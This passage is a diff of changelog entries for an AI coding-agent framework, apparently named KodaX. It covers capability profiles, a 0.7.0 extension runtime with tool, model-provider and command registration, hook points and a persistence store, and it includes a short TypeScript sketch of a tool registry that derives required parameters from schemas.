+ - **Capability profiles expanded**: Native providers declare `full` across all 6 new dimensions; CLI bridge providers declare `lossy`/`limited`/`stateless` as appropriate
+ - **`cloneCapabilityProfile` normalized**: Now returns profile with all capability fields populated via `normalizeCapabilityProfile`
+ - **Existing provider tests updated**: `acp-base`, `capability-profile`, `cli-bridge-providers`, `custom-providers` tests updated for 6 new profile fields
+
+ ### Documentation
+ - **FEATURE_034 design doc**: Capability profile section updated with 6 new dimensions
+ - **FEATURE_LIST.md**: Updated to reflect FEATURE_029 completion
+
+ ---
+
+ ## [0.7.0] - 2026-03-25
+
+ ### Added
+ - **Extension Runtime (FEATURE_034)**: Headless programmable runtime with four layers — Extension Runtime (loading, lifecycle, hot reload, provenance), Capability Runtime (discovery, execution, structured result transport), Runtime Control Surface (session state, queued follow-ups, active tools, model/thinking overrides), and Host Adapters (CLI `--extension`, config-based loading, REPL commands)
+ - **Extension API**: `registerTool`, `registerCapabilityProvider`, `registerModelProvider`, `registerCommand`, `registerSkillPath`, typed `on(event)`, explicit `hook(...)` for `session:hydrate`, `provider:before`, `tool:before`, `turn:settle`
+ - **Definition-first tool registry**: Tools registered through atomic `LocalToolDefinition` with schema-derived required params; same-name tool override with provenance tracking; removed `KODAX_TOOL_REQUIRED_PARAMS` parallel truth source
+ - **Runtime model provider registry**: Dynamic model provider registration in `@kodax/ai` with same-name override and `registerModelProvider` API
+ - **Extension persistence store**: JSONL-backed key-value store in `@kodax/agent` for extension session state, scoped per extension identity with versioned entries
+ - **Extension commands in REPL**: `/extensions` command to list loaded extensions and `/reload` command to hot-reload extensions
+ - **`--extension` CLI flag**: Load extensions from CLI invocation
+ - **Extension command registration**: Extensions can register custom REPL commands via `registerCommand`
+ - **JSON mode type guards**: `JsonEventsLogger` and `JsonEventEmitter` type guards for structured event streaming
+ - **Extension types in `@kodax/agent`**: `KodaXExtensionSessionRecord`, `KodaXExtensionSessionState`, `KodaXExtensionStore`, `KodaXJsonValue` types
+ - **New tests**: extension runtime, agent extension integration, persistence store, tool registry, REPL extension commands, storage, autocomplete extension paths, CLI option helpers
+
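The definition-first tool registry entry above combines two ideas: required parameters are derived from the tool's schema instead of a parallel table, and a same-name registration overrides an earlier one while provenance is retained. The sketch below illustrates both under stated assumptions: the `ToolDefinitionSketch` shape, the `ToolRegistrySketch` class, and the "most recent registration is active" rule are hypothetical and are not the actual `LocalToolDefinition` API.

```typescript
// Hypothetical definition shape with a JSON-Schema-like input schema.
interface ToolDefinitionSketch {
  name: string;
  source: string; // provenance, e.g. "builtin" or an extension identifier
  inputSchema: {
    type: "object";
    properties: Record<string, unknown>;
    required?: string[];
  };
}

class ToolRegistrySketch {
  // All registrations are kept per name so provenance is never lost.
  private readonly registrations = new Map<string, ToolDefinitionSketch[]>();

  register(definition: ToolDefinitionSketch): void {
    const existing = this.registrations.get(definition.name) ?? [];
    existing.push(definition);
    this.registrations.set(definition.name, existing);
  }

  // Assumption: the most recent registration for a name is the active one.
  getActive(name: string): ToolDefinitionSketch | undefined {
    const list = this.registrations.get(name);
    return list ? list[list.length - 1] : undefined;
  }

  // Required params come from the schema, so there is a single source of truth.
  requiredParams(name: string): string[] {
    return this.getActive(name)?.inputSchema.required ?? [];
  }

  // Provenance of every registration for a name, oldest first.
  sources(name: string): string[] {
    return (this.registrations.get(name) ?? []).map((d) => d.source);
  }
}
```

Deriving required parameters from the schema removes the risk of a separate required-params table drifting out of sync with the tool definitions, which is the stated motivation for removing `KODAX_TOOL_REQUIRED_PARAMS`.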
+ ### Changed
+ - **Agent loop extension integration**: Extension runtime wired into `agent.ts` at `session:hydrate`, `provider:before`, `tool:before`, and `turn:settle` hook points
+ - **Tool registry rewritten**: Multi-registration per tool name with active-selection semantics, `getRegisteredToolDefinition`, `getBuiltinRegisteredToolDefinition`, `listToolDefinitions` exported API
+ - **REPL commands refactored**: Chinese comments converted to English; extension-aware command dispatch; `getActiveExtensionRuntime` and `emitActiveExtensionEvent` wired into REPL commands
+ - **Storage module enhanced**: Extension session state and records persistence integrated into session storage
+ - **`@kodax/coding` public API expanded**: Extension runtime exports, capability types, tool definition types, extension store API
+ - **`@kodax/agent` public API expanded**: Extension store factory, extension types
+ - **`@kodax/ai` public API expanded**: Runtime model provider registration and resolver integration
+ - **`@kodax/skills` public API expanded**: `registerPluginSkillPath` for extension skill path registration
+ - **v0.7.0 feature design updated**: FEATURE_034 marked as Completed; roadmap dependency documentation finalized
+
+ ### Documentation
+ - **Design document restructure**: Major cleanup of v0.7.0 feature design doc, removing redundant historical drafts while preserving key implementation decisions
+ - **Feature boundary documentation**: Updated boundary sections for 034 across dependent features (019, 022, 029, 035, 038)